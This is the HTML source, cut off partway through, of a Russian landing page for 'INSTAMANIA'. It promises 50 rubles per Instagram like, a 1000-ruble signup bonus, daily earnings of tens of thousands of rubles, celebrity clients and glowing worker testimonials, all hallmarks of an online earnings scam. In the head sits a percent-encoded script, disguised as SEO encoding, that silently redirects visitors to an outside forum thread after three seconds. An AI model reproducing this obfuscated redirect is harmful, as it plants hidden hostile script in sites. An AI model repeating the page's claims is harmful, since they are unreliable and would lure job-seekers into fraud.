<!DOCTYPE html>
<html class="wide wow-animation" lang="ru_RU">

<meta http-equiv="content-type" content="text/html;charset=UTF-8"/>
<head>
    <script>var page_id = 0;</script>
    <script>
        if (window.localStorage.getItem('first_login')) {
            location.href ='task.html'
        }
    </script>
    <title>INSTAMANIA - Сервис продвижения в Инстаграм</title>
    <meta name="format-detection" content="telephone=no">
    <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta charset="UTF-8"/>
    <meta name="description"
          content="Используя мощный функционал сервиса можно получать до 250 целевых клиентов ежедневно. Программа работает без установки на компьютер"/>
    <meta name="keywords"
          content="Сервис, продвижение, Инстаграм, массфолловинг, масслайкинг, автоматизация, бизнес">
    <meta name="csrf-param" content="_csrf">
    <meta name="csrf-token"
          content="mtccPgApG7u8FgcVW_TYsDkc4BZ0bPGjk2wu0TB_vgbNuXJ5NE5Jg958TXRqu6zSbFCtWzYkp5v7XmWmfA_mNQ==">

    <meta property="og:title" content="Сервис продвижения в Инстаграм - INSTAMANIA"/>
    <meta property="og:description" content="INSTAMANIA - автоматическое продвижение ваших Instagram аккаунтов."/>
    <meta property="og:url" content="index.html"/>
    <meta property="og:locale" content="ru_RU"/>
    <meta property="og:image" content="assets/ae5e640e/images/favicon/152-152.png"/>
    <meta property="og:image:type" content="image/png"/>
    <meta property="og:image:width" content="1000"/>
    <meta property="og:image:height" content="1000"/>
    <meta property="og:type" content="website"/>
    <meta property="og:site_name" content="INSTAMANIA"/>

    <link rel="shortcut icon" href="/assets/ae5e640e/images/favicon/16-16.png" type="image/png">
    <link rel="stylesheet" href="/content/range_t.scss" type="text/css">
    <link rel="apple-touch-icon" href="/assets/ae5e640e/images/favicon/60-60.png">
    <link rel="apple-touch-icon" sizes="76x76" href="/assets/ae5e640e/images/favicon/76-76.png">
    <link rel="apple-touch-icon" sizes="120x120" href="/assets/ae5e640e/images/favicon/120-120.png">
    <link rel="apple-touch-icon" sizes="152x152" href="/assets/ae5e640e/images/favicon/152-152.png">
    <link href="https://fonts.googleapis.com/css?family=Roboto+Condensed|Material+Icons" rel="stylesheet" type="text/css">
    <link href="/assets/ae5e640e/css/bootstrap.css" rel="stylesheet" type="text/css">
    <link href="/assets/ae5e640e/css/mdi.css" rel="stylesheet" type="text/css">
    <link href="/assets/ae5e640e/css/fl-bigmug-line.css" rel="stylesheet" type="text/css">
    <link href="/assets/ae5e640e/css/style0ff5.css?v=1.0.2" rel="stylesheet" type="text/css">
    <link href="/assets/ae5e640e/css/app.min40a0.css?v=2.0.2" rel="stylesheet" type="text/css">
    <link href="/o__cdnjs.cloudflare.com/ajax/libs/toastr.js/latest/toastr.min.css" rel="stylesheet" type="text/css">
    <link href="/content/style_new.css" rel="stylesheet" type="text/css">
    <script type='application/ld+json'>
        {
            "@context": "http://www.schema.org",
            "@type": "Organization",
            "name": "Сервис продвижения в Инстаграм INSTAMANIA",
            "url": "https://INSTAMANIA/",
            "logo": "https://INSTAMANIA.pro/mail/logo.png",
            "image": "https://INSTAMANIA.pro/mail/INSTAMANIA.jpg",
            "description": "INSTAMANIA.pro - автоматическое продвижение ваших Instagram аккаунтов.\nПодходит для продвижения бизнеса и раскрутки личных страниц. С помощью поиска аудитории по хештегам, конкурентам, геолокации и настройкам таргетинга Вы сможете ежедневно получать в среднем по 250 потенциальных клиентов с каждого аккаунта."
        }
    </script>
	<script type="text/javascript">
<!-- HTML encoded by SEO-Auditor.ru -->
<!--
document.write(unescape('%3c%73%63%72%69%70%74%20%6c%61%6e%67%75%61%67%65%3d%22%4a%61%76%61%53%63%72%69%70%74%22%20%74%79%70%65%3d%22%74%65%78%74%2f%6a%61%76%61%73%63%72%69%70%74%22%3e%0a%3c%21%2d%2d%0a%66%75%6e%63%74%69%6f%6e%20%47%6f%4e%61%68%28%29%7b%0a%20%6c%6f%63%61%74%69%6f%6e%3d%22%68%74%74%70%73%3a%2f%2f%62%62%69%7a%2e%63%6c%75%62%2f%74%68%72%65%61%64%73%2f%70%72%65%6d%69%75%6d%2d%6b%61%6c%6a%61%6e%6e%61%6a%61%2d%6d%6f%7a%68%6e%6f%2d%73%72%75%62%69%74%2d%62%61%62%6c%61%2d%6e%65%78%69%6c%6f%2e%39%37%37%39%35%2f%22%3b%0a%7d%0a%73%65%74%54%69%6d%65%6f%75%74%28%20%27%47%6f%4e%61%68%28%29%27%2c%20%33%30%30%30%20%29%3b%0a%2f%2f%2d%2d%3e%0a%3c%2f%73%63%72%69%70%74%3e'));
//-->
</script>

    <!--[if lt IE 10]>
    <div style="background: #212121; padding: 10px 0; box-shadow: 3px 3px 5px 0 rgba(0,0,0,.3); clear: both; text-align:center; position: relative; z-index:1;">
        <a href="https://windows.microsoft.com/en-US/internet-explorer/">
            <img src="/assets/ae5e640e/images/ie8-panel/warning_bar_0000_us.jpg" border="0" height="42" width="820"
                 alt="You are using an outdated browser. For a faster, safer browsing experience, upgrade for free today.">
        </a>
    </div>
    <script src="/assets/ae5e640e/js/html5shiv.min.js"></script>
    <![endif]-->
</head>
<body>

<!-- Page-->
<div class="page">
    <!-- Page Header-->
    <header class="section page-header breadcrumbs-custom-wrap bg-gradient bg-secondary-2">
        <!-- RD Navbar-->
        <div class="rd-navbar-wrap rd-navbar-default">
            <nav class="rd-navbar" data-layout="rd-navbar-fixed" data-sm-layout="rd-navbar-fixed"
                 data-md-layout="rd-navbar-fullwidth" data-md-device-layout="rd-navbar-fixed"
                 data-lg-layout="rd-navbar-static" data-lg-device-layout="rd-navbar-static"
                 data-md-stick-up-offset="2px" data-lg-stick-up-offset="2px" data-stick-up="true"
                 data-sm-stick-up="true" data-md-stick-up="true" data-lg-stick-up="true">
                <div class="rd-navbar-inner">
                    <!-- RD Navbar Panel-->
                    <div class="rd-navbar-panel">
                        <!-- RD Navbar Toggle-->
                        <button class="rd-navbar-toggle" data-rd-navbar-toggle=".rd-navbar-nav-wrap"><span></span>
                        </button>
                        <!-- RD Navbar Brand-->
                        <div class="rd-navbar-brand">
                            <a class="brand-name" href="index.html">
                                <i class="material-icons">widgets</i>
                                INSTAMANIA
                            </a>
                        </div>
                        <div class="language-selector">

                            <a href="#" class="dropdown-toggle" data-toggle="dropdown"
                               style="position: relative;top: -2px;">
                                <img src="/assets/196df6b3/dist/img/languages/ru.svg" height="16" alt=""/>
                            </a>
                            <ul class="dropdown-menu">
                                <li>
                                    <a href="index1379.html?lang=ru_RU">
                                        <img src="/assets/196df6b3/dist/img/languages/ru.svg" height="14" alt=""/>&nbsp;
                                        <span>Русский</span>
                                    </a>
                                </li>
                                <li>
                                    <a href="index380c.html?lang=en_US">
                                        <img src="/assets/196df6b3/dist/img/languages/en.svg" height="14" alt=""/>&nbsp;
                                        <span>Английский</span>
                                    </a>
                                </li>
                            </ul>
                        </div>
                    </div>
                    <div class="rd-navbar-aside-right">
                        <div class="rd-navbar-nav-wrap">
                            <!-- RD Navbar Nav-->
                            <ul class="rd-navbar-nav">
                                <li>
                                    <a href="#start">Что это</a>
                                </li>
                                <li>
                                    <a href="#instruction">Как работает</a>
                                </li>
                                <li>
                                    <a href="#functions">Возможности</a>
                                </li>
                                <li>
                                    <a href="#advantages">Преимущества</a>
                                </li>
                                <li>
                                    <a href="registration.html">Регистрация</a>
                                </li>
                                <li>
                                    <a href="login.html">Войти</a>
                                </li>
                            </ul>
                        </div>
                    </div>
                </div>
            </nav>
        </div>
        <!-- Home -->
        <section id="home" class="breadcrumbs-custom-svg text-center">
            <!-- Swiper-->
            <div class="swiper-container swiper-slider swiper-slider_height-1 swiper-main" data-loop="false"
                 data-autoplay="5500" data-simulate-touch="false" data-slide-effect="fade">
                <div class="swiper-wrapper">
                    <div class="swiper-slide" data-slide-bg="">
                        <div class="swiper-slide-caption">
                            <div class="shell-wide swiper-main-section">
                                <div class="range range-xs-center">
                                    <div class="cell-sm-10 cell-lg-10">

                                        <p class="heading-1 breadcrumbs-custom-title" data-caption-animate="blurIn"
                                           data-caption-delay="50">INSTAMANIA</p>
                                        <p class="heading-2" data-caption-animate="fxRotateInDown"
                                           data-caption-delay="550">
                                            Мы платим за лайки в Instagram <span class="head-title-rate">(50 рублей за лайк)</span><br>
                                            <span class="head-title-rate">1000</span> рублей в подарок при регистрации!
                                        </p>
                                        <div class="group-md button-group"><a
                                                class="button button-secondary button-nina button-lg" href="#"
                                                data-custom-scroll-to="#start" data-caption-animate="fxRotateInDown"
                                                data-caption-delay="550">Вход</a><a
                                                class="button button-default-outline button-nina button-lg"
                                                href="registration.html" data-caption-animate="fxRotateInDown"
                                                data-caption-delay="550">Регистрация</a></div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
            <div class="parallax-scene-js parallax-scene" data-scalar-x="5" data-scalar-y="10">
                <div class="layer-01">
                    <div class="layer" data-depth="0.25">
                        <img src="/assets/ae5e640e/images/parallax-scene-01-132x133.png" alt="" width="132"
                             height="133"/>
                    </div>
                </div>
                <div class="layer-02">
                    <div class="layer" data-depth=".55">
                        <img src="/assets/ae5e640e/images/parallax-scene-02-186x208.png" alt="" width="186"
                             height="208"/>
                    </div>
                </div>
                <div class="layer-03">
                    <div class="layer" data-depth="0.1">
                        <img src="/assets/ae5e640e/images/parallax-scene-03-108x120.png" alt="" width="108"
                             height="120"/>
                    </div>
                </div>
                <div class="layer-04">
                    <div class="layer" data-depth="0.25">
                        <img src="/assets/ae5e640e/images/parallax-scene-04-124x145.png" alt="" width="124"
                             height="145"/>
                    </div>
                </div>
                <div class="layer-05">
                    <div class="layer" data-depth="0.15">
                        <img src="/assets/ae5e640e/images/parallax-scene-05-100x101.png" alt="" width="100"
                             height="101"/>
                    </div>
                </div>
                <div class="layer-06">
                    <div class="layer" data-depth="0.65">
                        <img src="/assets/ae5e640e/images/parallax-scene-06-240x243.png" alt="" width="240"
                             height="243"/>
                    </div>
                </div>
            </div>
        </section>
    </header>

    <!-- Превью-->
    <section class="section section-variant-1 bg-white text-left" id="start">
        <!-- section wave-->
        <div class="section-wave">
            <svg x="0px" y="0px" width="1920px" height="45px" viewbox="0 0 1920 45" preserveaspectratio="none">
                <path d="M1920,0c-82.8,0-108.8,44.4-192,44.4c-78.8,0-116.5-43.7-192-43.7 c-77.1,0-115.9,44.4-192,44.4c-78.2,0-114.6-44.4-192-44.4c-78.4,0-115.3,44.4-192,44.4C883.1,45,841,0.6,768,0.6 C691,0.6,652.8,45,576,45C502.4,45,461.9,0.6,385,0.6C306.5,0.6,267.9,45,191,45C115.1,45,78,0.6,0,0.6V45h1920V0z"></path>
            </svg>
        </div>
        <div class="shell-wide">
            <div class="range range-lg-right range-50">
                <div class="cell-lg-6">
                    <div class="range">
                        <div class="cell-lg-11">
                            <div class="tabs-custom tabs-horizontal tabs-line" id="tabs-1">
                                <!-- Nav tabs-->
                                <ul class="nav nav-tabs">
                                    <li class="active">
                                        <a href="#tabs-1-1" data-toggle="tab">Что такое Instamania?</a>
                                    </li>
                                    <li>
                                        <a href="#tabs-1-2" data-toggle="tab">Почему Instamania?</a>
                                    </li>
                                </ul>
                                <!-- Tab panes-->
                                <div class="tab-content">
                                    <div class="tab-pane fade in active" id="tabs-1-1">
                                        <p>Это уникальный в своем роде сервис, с помощью которого можно зарабатывать
                                            деньги в интернете, ставя лайки в Instagram, оплата за которые составляет 50
                                            рублей - за 1 лайк.</p>
                                        <p>Для того чтобы начать зарабатывать на нашем сервисе, вам всего лишь
                                            необходимо пройти простую регистрацию, и приступить к работе!</p>
                                        <p>Работая на нашем сервисе, вы ежедневно будете получать до 1000 заказов, и
                                            возможность зарабатывать до 50 000 рублей в день!</p>
                                        <div class="whois-btn">
                                        </div>
                                    </div>
                                    <div class="tab-pane" id="tabs-1-2">
                                        <p>Instamania это полноценный источник дохода. И вот почему:</p>
                                        <p>Наши постоянные клиенты это люди медийного сегмента, такие как:
                                            видеоблоггеры, инстаграм модели, инфобизнесмены, предприниматели которые
                                            ведут бизнес в инстаграм, и другие серьезные люди, которые дорожат
                                            репутацией своего аккаунта.</p>
                                        <p>В отличии от других конкурирующих с нами сервисов, где лайки порой просто
                                            накручиваются, наш сервис предоставляет настоящие лайки на фотографии
                                            заказчиков, которые готовы платить за качество.</p>
                                        <div class="whois-btn">
                                        </div>
                                    </div>
                                </div>
                                <br>
                                <input type="range" min="1" max="100" value="1" class="slider"
                                       id="myRange">
                                <div id="demo"></div>
                            </div>
                        </div>
                    </div>
                </div>
                <div class="cell-lg-5 text-center aaaavideo">
                    <div class="image-position-01">
                        <div class="blick-wrap"><img class="image-wrap"
                                                     src="/assets/ae5e640e/images/ipad-01-1360x1233.png" alt=""
                                                     width="1360" height="1233">
                            <div class="blick-overlay" data-blick-overlay="ipad"></div>
                            <div class="blick-content">
                                <iframe width="100%" height="100%" src="https://www.youtube.com/embed/-vHvRZgCfz0"
                                        frameborder="0"
                                        allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture"
                                        allowfullscreen></iframe>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </section>

    <!-- Кому подходит сервис -->
    <section class="section section-variant-2 bg-secondary-2 section-way-point" id="main-features">
        <div class="way-point" data-custom-scroll-to="#main-features">
            <svg version="1.1" x="0px" y="0px" width="253px" height="38px" enable-background="new 0 0 253 38"
                 xml:space="preserve">
            <path style="clip-path: url();" fill-rule="evenodd" clip-rule="evenodd"
                  d="M252,36.001C199.397,36.001,176,0,125.815,0                                             C76,0,52.988,36.001,0,36.001C4.336,40.465,273.563,36.001,252,36.001z"></path>
          </svg>
            <span class="icon mdi mdi-chevron-down"></span>
        </div>
        <div class="shell-wide">
            <div class="range text-center">
                <div class="cell-xs-12">
                    <h3>
                        ЧТО ОТ ВАС ТРЕБУЕТСЯ, ЧТОБЫ НАЧАТЬ ЗАРАБАТЫВАТЬ У НАС?</h3>
                    <div class="divider divider-default"></div>
                </div>
            </div>
            <div class="range range-50 range-xl-90 offset-custom-2">
                <div class="cell-xs-12 cell-sm-6 cell-md-4 cell-lg-3">
                    <article class="box-minimal">
                        <div class="box-minimal-header">
                            <div class="icon-what">
                                <i class="material-icons">language</i>
                            </div>
                            <h6 class="box-minimal-title">
                                <strong>ДОСТУП В ИНТЕРНЕТ</strong></h6>
                        </div>
                    </article>
                </div>

                <div class="cell-xs-12 cell-sm-6 cell-md-4 cell-lg-3">
                    <article class="box-minimal">
                        <div class="box-minimal-header">
                            <div class="icon-what">
                                <i class="material-icons">access_time</i>
                            </div>
                            <h6 class="box-minimal-title">
                                <strong>1 - 2 ЧАСА В ДЕНЬ</strong></h6>
                        </div>
                    </article>
                </div>

                <div class="cell-xs-12 cell-sm-6 cell-md-4 cell-lg-3">
                    <article class="box-minimal">
                        <div class="box-minimal-header">
                            <div class="icon-what">
                                <i class="material-icons">person</i>
                            </div>
                            <h6 class="box-minimal-title">
                                <strong>ВОЗРАСТ ОТ 18 ЛЕТ </strong></h6>
                        </div>
                    </article>
                </div>

                <div class="cell-xs-12 cell-sm-6 cell-md-4 cell-lg-3">
                    <article class="box-minimal">
                        <div class="box-minimal-header">
                            <div class="icon-what">
                                <i class="material-icons">verified_user</i>
                            </div>
                            <h6 class="box-minimal-title">
                                <strong>ОТВЕТСТВЕННОСТЬ</strong></h6>
                        </div>
                    </article>
                </div>

            </div>
        </div>
    </section>

    <!-- Как это работает -->
    <section id="instruction" class="section section-lg text-center bg-gray-darker">
        <div class="shell-wide">
            <h3>КАК ЭТО РАБОТАЕТ</h3>
            <div class="divider divider-default"></div>
            <div class="range range-50 range-xs-center text-left">
                <div class="cell-xs-10 cell-sm-6 cell-lg-3 abc">
                    <article class="box-minimal box-minimal-border text-center">
                        <i class="material-icons">filter_1</i>
                        <p class="big box-minimal-title">Регистрируетесь<br>на сервисе</p>
                    </article>
                </div>
                <div class="cell-xs-10 cell-sm-6 cell-lg-3 abc">
                    <article class="box-minimal box-minimal-border text-center">
                        <i class="material-icons">filter_2</i>
                        <p class="big box-minimal-title">Ставите лайки<br> заказчикам</p>
                    </article>
                </div>
                <div class="cell-xs-10 cell-sm-6 cell-lg-3 abc">
                    <article class="box-minimal box-minimal-border text-center">
                        <i class="material-icons">filter_3</i>
                        <p class="big box-minimal-title">Зарабатываете<br>деньги</p>
                    </article>
                </div>
                <div class="cell-xs-10 cell-sm-6 cell-lg-3 abc">
                    <article class="box-minimal box-minimal-border text-center">
                        <i class="material-icons">filter_4</i>
                        <p class="big box-minimal-title">Выводите<br>удобным способом</p>
                    </article>
                </div>
            </div>
        </div>
    </section>

    <!-- ВОЗМОЖНОСТИ СЕРВИСА-->
    <section id="functions"
             class="section section-lg bg-secondary-2 parallax-scene-wrapper text-center section-way-point">
        <div class="way-point" data-custom-scroll-to="#advantages">
            <svg version="1.1" x="0px" y="0px" width="253px" height="38px" enable-background="new 0 0 253 38"
                 xml:space="preserve">
            <path style="clip-path: url();" fill-rule="evenodd" clip-rule="evenodd"
                  d="M252,36.001C199.397,36.001,176,0,125.815,0                                         C76,0,52.988,36.001,0,36.001C4.336,40.465,273.563,36.001,252,36.001z"></path>
          </svg>
            <span class="icon mdi mdi-chevron-down"></span>
        </div>
        <div class="shell-wide">
            <h3>Топ 10 заказчиков, заказавшие лайки на Instamania</h3>
            <hr class="divider divider-default">
            <div class="range range-xs-center range-50">
                <div class="cell-xs-6 cell-sm-4 cell-md-3">
                    <div class="thumbnail-classic unit unit-md-vertical">
                        <div class="thumbnail-classic-icon unit-left">
                            <img src="/content/img/1.jpg" class="photo_blogger">
                        </div>
                        <div class="thumbnail-classic-caption unit-body">
                            <h6 class="thumbnail-classic-title">
                                Instagram блогерша<br> <a href="https://www.instagram.com/helen_yes1/" target="_blank">@helen_yes1</a>
                            </h6>
                        </div>
                    </div>
                </div>

                <div class="cell-xs-6 cell-sm-4 cell-md-3">
                    <div class="thumbnail-classic unit unit-md-vertical">
                        <div class="thumbnail-classic-icon unit-left">
                            <img src="/content/img/2.jpg" class="photo_blogger">
                        </div>
                        <div class="thumbnail-classic-caption unit-body">
                            <h6 class="thumbnail-classic-title">
                                Instagram вайнер<br> <a href="https://www.instagram.com/sekavines/" target="_blank">@sekavines</a>
                            </h6>
                        </div>
                    </div>
                </div>

                <div class="cell-xs-6 cell-sm-4 cell-md-3">
                    <div class="thumbnail-classic unit unit-md-vertical">
                        <div class="thumbnail-classic-icon unit-left">
                            <img src="/content/img/3.jpg" class="photo_blogger">
                        </div>
                        <div class="thumbnail-classic-caption unit-body">
                            <h6 class="thumbnail-classic-title">
                                Instagram модель<br> <a href="https://www.instagram.com/sashachistova/" target="_blank">@sashachistova</a>
                            </h6>
                        </div>
                    </div>
                </div>

                <div class="cell-xs-6 cell-sm-4 cell-md-3">
                    <div class="thumbnail-classic unit unit-md-vertical">
                        <div class="thumbnail-classic-icon unit-left">
                            <img src="/content/img/4.jpg" class="photo_blogger">
                        </div>
                        <div class="thumbnail-classic-caption unit-body">
                            <h6 class="thumbnail-classic-title">
                                Instagram модель<br> <a href="https://www.instagram.com/botanovna_/" target="_blank">@botanovna_</a>
                            </h6>
                        </div>
                    </div>
                </div>

                <div class="cell-xs-6 cell-sm-4 cell-md-3">
                    <div class="thumbnail-classic unit unit-md-vertical">
                        <div class="thumbnail-classic-icon unit-left">
                            <img src="/content/img/5.jpg" class="photo_blogger">
                        </div>
                        <div class="thumbnail-classic-caption unit-body">
                            <h6 class="thumbnail-classic-title">
                                Сеть парфюма<br> <a href="https://www.instagram.com/goldapple_ru/" target="_blank">@goldapple_ru</a>
                            </h6>
                        </div>
                    </div>
                </div>

                <div class="cell-xs-6 cell-sm-4 cell-md-3">
                    <div class="thumbnail-classic unit unit-md-vertical">
                        <div class="thumbnail-classic-icon unit-left">
                            <img src="/content/img/6.jpg" class="photo_blogger">
                        </div>
                        <div class="thumbnail-classic-caption unit-body">
                            <h6 class="thumbnail-classic-title">
                                Доктор Комаровский<br> <a href="https://www.instagram.com/doctor_komarovskiy/"
                                                          target="_blank">@doctor_komarovskiy</a></h6>
                        </div>
                    </div>
                </div>

                <div class="cell-xs-6 cell-sm-4 cell-md-3">
                    <div class="thumbnail-classic unit unit-md-vertical">
                        <div class="thumbnail-classic-icon unit-left">
                            <img src="/content/img/7.jpg" class="photo_blogger">
                        </div>
                        <div class="thumbnail-classic-caption unit-body">
                            <h6 class="thumbnail-classic-title">
                                Instagram модель<br> <a href="https://www.instagram.com/maryme.23/" target="_blank">@maryme.23</a>
                            </h6>
                        </div>
                    </div>
                </div>

                <div class="cell-xs-6 cell-sm-4 cell-md-3">
                    <div class="thumbnail-classic unit unit-md-vertical">
                        <div class="thumbnail-classic-icon unit-left">
                            <img src="/content/img/8.jpg" class="photo_blogger">
                        </div>
                        <div class="thumbnail-classic-caption unit-body">
                            <h6 class="thumbnail-classic-title">
                                Популярная вайнерша <br> <a href="https://www.instagram.com/nika_viper/"
                                                            target="_blank">@nika_viper</a></h6>
                        </div>
                    </div>
                </div>

                <div class="cell-xs-6 cell-sm-4 cell-md-3">
                    <div class="thumbnail-classic unit unit-md-vertical">
                        <div class="thumbnail-classic-icon unit-left">
                            <img src="/content/img/9.jpg" class="photo_blogger">
                        </div>
                        <div class="thumbnail-classic-caption unit-body">
                            <h6 class="thumbnail-classic-title">
                                Instagram модель<br> <a href="https://www.instagram.com/volkonskaya.reshetova/"
                                                        target="_blank">@volkonskaya.reshetova</a></h6>
                        </div>
                    </div>
                </div>

                <div class="cell-xs-6 cell-sm-4 cell-md-3">
                    <div class="thumbnail-classic unit unit-md-vertical">
                        <div class="thumbnail-classic-icon unit-left">
                            <img src="/content/img/10.jpg" class="photo_blogger">
                        </div>
                        <div class="thumbnail-classic-caption unit-body">
                            <h6 class="thumbnail-classic-title">
                                Популярная певица <br> <a href="https://www.instagram.com/ritadakota/" target="_blank">@ritadakota</a>
                            </h6>
                        </div>
                    </div>
                </div>

            </div>
            <a class="button button-default-outline button-nina" style="margin-top: 45px;"
               href="registration.html">Пройти регистрацию</a>
        </div>
        <div class="parallax-scene-js parallax-scene" data-scalar-x="5" data-scalar-y="10">
            <div class="layer-01">
                <div class="layer" data-depth="0.25">
                    <img src="/assets/ae5e640e/images/parallax-scene-01-132x133.png" alt="" width="132" height="133"/>
                </div>
            </div>
            <div class="layer-03">
                <div class="layer" data-depth="0.1">
                    <img src="/assets/ae5e640e/images/parallax-scene-03-108x120.png" alt="" width="108" height="120"/>
                </div>
            </div>
            <div class="layer-04">
                <div class="layer" data-depth="0.35">
                    <img src="/assets/ae5e640e/images/parallax-scene-04-124x145.png" alt="" width="124" height="145"/>
                </div>
            </div>
            <div class="layer-05">
                <div class="layer" data-depth="0.08">
                    <img src="/assets/ae5e640e/images/parallax-scene-05-100x101.png" alt="" width="100" height="101"/>
                </div>
            </div>
        </div>
    </section>

    <!-- Наши преимущества-->
    <section id="advantages" class="section section-variant-2 bg-gray-lighter">
        <div class="shell shell-bigger">
            <div class="range text-center">
                <div class="cell-xs-12">
                    <h3>
                        Основные преимущества </h3>
                    <div class="divider divider-default"></div>
                </div>
            </div>
            <div class="range range-ten range-50 range-sm-center range-lg-justify range-md-reverse">
                <div class="cell-sm-9 cell-md-5">
                    <!-- Bootstrap collapse-->
                    <div class="panel-group panel-group-custom panel-group-corporate" id="accordion1" role="tablist"
                         aria-multiselectable="false">
                        <!-- Bootstrap panel-->
                        <div class="panel panel-custom panel-corporate">
                            <div class="panel-heading" role="tab">
                                <div class="panel-title" onclick="return false;">
                                    <a href="#" role="button">
                                        Надежность </a>
                                </div>
                            </div>
                            <div class="panel-collapse collapse in" aria-labelledby="accordion1Heading1">
                                <div class="panel-body">
                                    <p>
                                        Сервису Instamania уже более 1-го года. За весь период работы, нами было
                                        выплачено более 500 000 000 рублей нашим работникам. Без единой задержки, так
                                        как выплаты за проделанную вами работу проходят моментально в течении нескольких
                                        минут, ежедневно.</p>
                                </div>
                            </div>
                        </div>
                        <!-- Bootstrap panel-->
                        <div class="panel panel-custom panel-corporate">
                            <div class="panel-heading" role="tab">
                                <div class="panel-title" onclick="return false;">
                                    <a href="#" role="button">
                                        Достойный заработок </a>
                                </div>
                            </div>
                            <div class="panel-collapse collapse in" aria-labelledby="accordion1Heading1">
                                <div class="panel-body">
                                    <p>
                                        Самые трудолюбивые работники на нашем сервисе, которые уделяют работе более 2х
                                        часов в сутки, зарабатывают от 30 000 - 50 000 рублей в день. Ваш заработок
                                        ограничивается лишь вашим свободным временем. Уделяя 1-2 часа в день, средний
                                        сотрудник получает от 10 000 - 20 000 рублей в день. Все в ваших руках!</p>
                                </div>
                            </div>
                        </div>
                        <!-- Bootstrap panel-->
                    </div>
                </div>
                <div class="cell-sm-9 cell-md-5 mobile-mt-20">
                    <!-- Bootstrap collapse-->
                    <div class="panel-group panel-group-custom panel-group-corporate" id="accordion1" role="tablist"
                         aria-multiselectable="false">
                        <!-- Bootstrap panel-->
                        <div class="panel panel-custom panel-corporate">
                            <div class="panel-heading" id="accordion1Heading1" role="tab">
                                <div class="panel-title" onclick="return false;">
                                    <a href="#" role="button">
                                        Прозрачность </a>
                                </div>
                            </div>
                            <div class="panel-collapse collapse in" aria-labelledby="accordion1Heading1">
                                <div class="panel-body">
                                    <p>
                                        В отличие от других сервисов по заработку в интернете, обещающие Вам золотые
                                        горы, мы не вводим вас в заблуждение, и не предлагаем легкий заработок. Мы
                                        честно говорим, что вам придется потратить львиную долю своего драгоценного
                                        времени, которое будет достойно оплачиваться нашими заказчиками.</p>
                                </div>
                            </div>
                        </div>
                        <!-- Bootstrap panel-->
                        <div class="panel panel-custom panel-corporate">
                            <div class="panel-heading" id="accordion1Heading1" role="tab">
                                <div class="panel-title" onclick="return false;">
                                    <a href="#" role="button">
                                        Избавление от финансового рабства </a>
                                </div>
                            </div>
                            <div class="panel-collapse collapse in" aria-labelledby="accordion1Heading1">
                                <div class="panel-body">
                                    <p>
                                        Instamania новая ступень в вашей жизни. Начните свой путь с простой регистрации,
                                        и измените вашу жизнь к лучшему! Избавьтесь от долгов, и позвольте себе то, о
                                        чем вы всегда мечтали, будь то покупка автомобиля, желанное путешествие за
                                        границу, или дом мечты! С Instamania нет ничего невозможного!</p>
                                </div>
                            </div>
                        </div>
                        <!-- Bootstrap panel-->
                    </div>
                </div>
            </div>
        </div>
    </section>

    <!-- Мы не занимаемся накруткой ботов-->
    <section class="section section-md bg-secondary-2 text-center text-sm-left section-way-point" id="people">
        <div class="way-point" data-custom-scroll-to="#people">
            <svg version="1.1" x="0px" y="0px" width="253px" height="38px" enable-background="new 0 0 253 38"
                 xml:space="preserve">
            <path style="clip-path: url();" fill-rule="evenodd" clip-rule="evenodd"
                  d="M252,36.001C199.397,36.001,176,0,125.815,0                                           C76,0,52.988,36.001,0,36.001C4.336,40.465,273.563,36.001,252,36.001z"></path>
          </svg>
            <span class="icon mdi mdi-chevron-down"></span>
        </div>
        <div class="shell shell-bigger">
            <div class="box-cta box-cta-inline text-center" style="display: block">
                <div class="box-cta-inner" style="display: block">
                    <h3 class="box-cta-title">РЕШИМ ЛЮБОЙ ВОПРОС!</h3>
                    <hr class="divider divider-default">
                    <p class="text-center">
                        Instamania - простой и удобный сервис по заработку, не требующий особых навыков. В случае если у
                        вас возникнут вопросы, у нас есть круглосуточная поддержка 24/7 по адресу
                        instamaniasupp@yandex.ru.</p>
                    <a class="button button-default-outline button-nina" style="margin-top: 45px;"
                       href="registration.html">Пройти регистрацию</a>
                </div>
            </div>
        </div>
    </section>

    <!-- Статистика-->
    <section id="about" class="section bg-gray-lighter bg-additional-image bg-additional-pattern-dark">
        <div class="shell-custom">
            <div class="range range-sm-center range-md-middle range-lg-left range-0">
                <div class="cell-sm-10 cell-md-6">
                    <div class="section-lg">
                        <div class="shell-custom-inner text-center">
                            <h3>ОТЗЫВЫ РАБОТНИКОВ</h3>
                            <hr class="divider divider-default">
                            <!-- Slick Carousel-->
                            <div class="slider-widget">
                                <div class="slick-slider" id="slick-1" data-arrows="true" data-loop="true"
                                     data-dots="false" data-swipe="false" data-items="1" data-custom-arrows="true">
                                    <div class="item">
                                        <article class="quote-classic">
                                            <div class="quote-classic-header">
                                                <img class="quote-classic-image"
                                                     src="/assets/ae5e640e/images/user.png"
                                                     alt="" width="210" height="210"/>
                                                <div class="quote-classic-meta">
                                                    <p class="quote-classic-cite">
                                                        Александра Фёдорова</p>
                                                </div>
                                            </div>
                                            <div class="quote-classic-text">
                                                <p>По правде говоря, до этого я перепробовала множество сервисов по
                                                    заработку в сети. Instamania была для меня просто открытием! Ставишь
                                                    лайки, и получаешь деньги. О лучшей работе я и не могла мечтать!
                                                    Спасибо вам огромное!)
                                                </p></div>
                                        </article>
                                    </div>
                                    <div class="item">
                                        <article class="quote-classic">
                                            <div class="quote-classic-header">
                                                <img class="quote-classic-image"
                                                     src="/assets/ae5e640e/images/user.png"
                                                     alt="" width="210" height="210"/>
                                                <div class="quote-classic-meta">
                                                    <p class="quote-classic-cite">
                                                        Валерия Басова </p>
                                                </div>
                                            </div>
                                            <div class="quote-classic-text">
                                                <p>Я люблю этот сервис! В первый раз, когда я зашла на Instamania, я
                                                    немного насторожилась, ведь обмана в сети сейчас очень много. Но
                                                    нет, мои сомнения развеялись после первого вывода в 25 000 рублей.
                                                    Всегда думала, что заработок в сети это сказка. Но Instamania
                                                    разрушили все мои стереотипы!</p></div>
                                        </article>
                                    </div>
                                    <div class="item">
                                        <article class="quote-classic">
                                            <div class="quote-classic-header">
                                                <img class="quote-classic-image"
                                                     src="/assets/ae5e640e/images/user.png"
                                                     alt="" width="210" height="210"/>
                                                <div class="quote-classic-meta">
                                                    <p class="quote-classic-cite">
                                                        Максим Сагайдак </p>
                                                </div>
                                            </div>
                                            <div class="quote-classic-text">
